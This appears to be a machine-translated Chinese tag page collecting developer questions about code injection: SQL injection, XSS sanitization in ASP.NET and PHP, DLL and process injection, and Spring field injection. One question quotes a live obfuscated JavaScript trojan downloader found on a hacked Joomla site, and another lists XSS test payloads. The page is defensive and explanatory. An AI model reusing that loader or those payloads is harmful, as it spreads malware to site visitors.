Tag: 代码注入
参数化语句可以停止所有的SQL注入吗?
如果是,为什么仍然有这么多成功的SQL注入? 仅仅因为一些开发者太愚蠢的使用参数化语句?
在“任何CPU”.NET程序集上强制执行x86 CLR
在.NET中,“平台目标:任何CPU”编译器选项允许.NET程序集在x64机器上以64位运行,在x86机器上以32位运行。 也可以使用“Platform Target:x86”编译器选项强制程序集在x64机器上作为x86运行。 是否有可能使用“任何CPU”标志运行程序集,但确定它是否应该在x86或x64 CLR中运行? 正常情况下,这个决定是由CLR / OS Loader(根据我的理解)根据底层系统的位数来做出的。 我正在尝试编写一个C#.NET应用程序,它可以与其他正在运行的进程交互(读入:注入代码)。 x64进程只能注入到其他x64进程中,并且与x86一样。 理想情况下,我想利用JIT编译和Any CPU选项来允许单个应用程序用于注入x64或x86进程(在x64机器上)。 这个想法是,应用程序将被编译为任何CPU 。 在x64机器上,它将以x64运行。 如果目标进程是x86,则应该重新启动自己,强制CLR将其作为x86运行。 这可能吗?
这个混乱如何工作?
我的Joomla! 网站已被多次入侵。 有人,不知何故,设法注入下面的垃圾到关键的PHP脚本,但我的意思是不谈论configurationJoomla。 该网站访问量不大(有时我担心我可能是该网站的唯一访问者…),我不关心网站备份和运行。 我会最终处理的。 我的问题是,这个垃圾如何工作? 我看着它,我只是不知道这是如何做到有害的? 它试图下载一个名为ChangeLog.pdf的PDF文件,该文件感染了木马,打开后会冻结Acrobat,并在您的机器上造成严重破坏。 它怎么做,我不知道,我不在乎。 但是下面这段脚本是如何调用下载的? <script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script> <!–6f471c20c9b96fed179c85ffdd3365cf–> ESET已将此代码检测为JS / TrojanDownloader.Agent.NRO木马
我如何防止DLL注入
所以有一天,我看到这个: http://www.edgeofnowhere.cc/viewtopic.php?p=2483118 它通过三种不同的DLL注入方法。 我将如何防止这些过程? 或者至less,我如何防止第一个? 我想也许是一个Ring 0驱动程序也许是唯一的方法来阻止所有这三个,但我想看看社区的想法。
在两个进程(C,Windows)之间共享内存
由于我没有find一个问题的答案在这里以前问我在尝试一种不同的方法。 有什么办法可以在两个进程之间共享内存? 第二个过程从注入中获取信息,因为它是一个传统程序,它不再被支持。 我的想法是在那里注入一些代码,在我传递给注入的程序的结构中,将地址(或其他)传递给共享内存,我需要运行的数据位于该共享内存中。 一旦我得到的数据,我将在注入的线程中填充我自己的variables。 这可能吗? 怎么样? 代码表示赞赏。 编辑: 我认为这不清楚,所以我会澄清。 我知道如何注入。 我已经在做了。 这里的问题是将dynamic数据传递给注入。
如何防止用户生成的HTML内的Javascript注入攻击
我正在保存用户提交的HTML(在数据库中)。 我必须防止Javascript注入攻击。 我所看到的最有害的是一个style =“expression(…)”的脚本。 除此之外,相当数量的有效用户内容将包括特殊字符和XML结构,因此如果可能的话,我想避免使用白名单方法。 (列出每个允许的HTML元素和属性)。 Javascript攻击string的例子是: 1) “你好,我对<dog>元素有一个<script>警告(”坏!“)</ script>问题…” 2) “嗨,这个<b style =”width:expression式(alert('bad!'))“>狗</ b>是黑色的。 有没有办法来防止这样的Javascript,并保持完整的rest? 我迄今唯一的解决scheme是使用正则expression式来删除某些模式。 它解决了案例1,但不是案例2。 编辑:对不起,忘了提及环境 – 它本质上是MS堆栈: SQL Server 2005 C#3.5(ASP.NET) Javascript(显然)和jQuery。 我想chopppoint是ASP.NET层 – 任何人都可以制作一个错误的HTTP请求。 编辑2: 感谢大家的链接。 假设我可以定义我的列表(他的内容将包括许多math和编程结构,所以白名单将是非常恼人的)我仍然有一个问题在这里: 什么样的parsing器可以让我删除“坏”的部分? 坏的部分可能是一个完整的元素,但是那些驻留在属性中的脚本又如何? 我无法删除<a hrefs> willy-nilly。
如何防止在PHP中的代码注入攻击?
我很混乱,PHP中有这么多函数,有些使用这个,有些使用这个函数。 有些人使用: htmlspecialchars() , htmlentities() , strip_tags()等 哪一个是正确的,你们通常使用什么? 这是正确的(build议我一个更好的,如果有的话): $var = mysql_real_escape_string(htmlentities($_POST['username'])); 这一行可以防止MySQL注入和XSS的攻击 顺便说一下,除了XSS攻击和MySQL注入之外,还有什么其他的事情需要注意吗? 编辑 总结: 如果我想插入string到数据库,我不需要使用htmlentities ,只需使用mysql_real_escape_string 。 当显示数据时,使用htmlentities() ,这是你所有的意思? 总结: 插入数据库时使用的mysql_real_escape_string htmlentities()数据输出到网页时使用的htmlentities() htmlspecialchars()用什么时候? strip_tags()用于什么时候? addslashes()使用什么时候? 有人可以填写问号吗?
spring:如何注入静态字段的值?
有了这门课 @Component public class Sample { @Value("${my.name}") public static String name; } 如果我尝试Sample.name,它总是'空'。 所以我试了一下 public class Sample { public static String name; @PostConstruct public void init(){ name = privateName; } @Value("${my.name}") private String privateName; public String getPrivateName() { return privateName; } public void setPrivateName(String privateName) { this.privateName = privateName; } } 此代码工作。 Sample.name设置正确。 这是好方法吗? 如果不是,还有什么更好的方法? […]
拒绝执行JavaScript脚本。 在请求中find脚本的源代码
在WebKit中,我的JavaScript上出现以下错误: 拒绝执行JavaScript脚本。 在请求中find脚本的源代码。 该代码是为JavaScript的spinners,看ASCII艺术 。 代码用于工作正常,并仍然在Camino和Firefox中正常工作。 这个错误似乎只是通过POST保存页面,然后通过GET获取。 它发生在Chrome / Mac和Safari / Mac中。 任何人都知道这是什么意思,以及如何解决这个问题?
PHP MySQLI阻止SQL注入
我已经build立了一个网站,将很快上线,只是有一些关于防止SQL注入的问题,我明白如何使用mysqli_real_escape_string但我只是想知道是否我必须使用所有我得到的variables我的SQL语句,我必须使用它时,我还做select语句还是只插入更新和删除? 还有什么其他的安全性,你会build议我实施之前,我把网站住,预先感谢任何帮助!
